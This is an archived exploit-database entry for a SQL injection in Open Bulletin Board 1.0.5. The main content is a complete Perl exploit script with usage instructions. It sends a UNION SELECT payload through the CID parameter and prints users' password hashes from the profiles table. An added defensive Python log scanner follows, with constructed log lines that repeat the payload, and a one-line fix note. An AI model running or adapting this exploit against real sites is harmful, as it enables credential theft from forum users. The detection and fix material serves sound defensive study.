Open Bulletin Board <= 1.0.5 - SQL Injection Exploit

2005-07-18T00:00:00
ID EDB-ID:1111
Type exploitdb
Reporter RusH
Modified 2005-07-18T00:00:00

Description

Open Bulletin Board <= 1.0.5 SQL Injection Exploit. Webapps exploit for php platform

#!/usr/bin/perl -w
  
 # OpenBB sql injection 
 # tested on Open Bulletin Board 1.0.5 with mysql 
 # (c)oded by x97Rang 2005 RST/GHC 
 # Gr33tz:  __blf, 1dt.w0lf 
  
 use IO::Socket; 
  
 if (@ARGV != 3) 
 { 
    print "\nUsage: $0 [server] [path] [id]\n"; 
    print "like $0 forum.mysite.com / 1\n"; 
    print "If found nothing - forum NOT vulnerable\n\n"; 
    exit (); 
 } 
  
 $server = $ARGV[0]; 
 $path = $ARGV[1]; 
 $id = $ARGV[2]; 
  
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
 printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", 
  $path,$server,$id); 
  
 while(<$socket>)
 {
     if (/\>(\w{32})\</) { print "$1\n"; }
 }

# milw0rm.com [2005-07-18]
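
For defenders reviewing web server logs, the request this script sends is easy to spot because the CID parameter of index.php carries SQL instead of a number. The following is an added detection example, not part of the original exploit or of OpenBB; it assumes common/combined access-log format and that CID is a plain integer in legitimate use, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (addresses, times, sizes and paths are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2005:10:01:02 +0000] "GET /index.php?CID=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Jul/2005:10:01:09 +0000] "GET /index.php?CID=999+union+select+1,1,'
    'password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=1/* HTTP/1.0" 200 4801',
    '203.0.113.9 - - [18/Jul/2005:10:01:15 +0000] "GET /forum/index.php?CID=999%20UNION%20SELECT%201 HTTP/1.0" 200 4790',
    '203.0.113.5 - - [18/Jul/2005:10:02:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 900',
]

# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)


def suspicious_cid_requests(lines):
    """Return (client, decoded CID, reason) for index.php requests whose CID is not an integer."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs decodes '+' and %xx, so encoded variants compare equal.
        for value in parse_qs(url.query, keep_blank_values=True).get("CID", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumption: legitimate CID values are plain integers
            reason = "union-select" if UNION_SELECT.search(value) else "non-numeric"
            hits.append((client, value, reason))
    return hits


if __name__ == "__main__":
    for client, value, reason in suspicious_cid_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same integer-only rule applied to CID inside the application, before the value reaches the query, is the corresponding fix.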